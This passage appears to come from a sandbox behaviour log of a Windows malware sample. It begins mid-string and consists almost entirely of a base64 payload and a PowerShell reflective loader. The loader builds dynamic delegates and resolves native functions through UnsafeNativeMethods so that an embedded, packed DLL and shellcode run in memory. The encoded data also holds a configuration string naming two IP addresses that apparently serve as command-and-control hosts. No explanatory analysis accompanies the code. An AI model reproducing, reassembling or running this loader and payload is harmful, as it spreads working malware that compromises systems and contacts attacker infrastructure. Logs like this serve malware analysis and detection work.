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") returned="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"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" [0035.915] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] 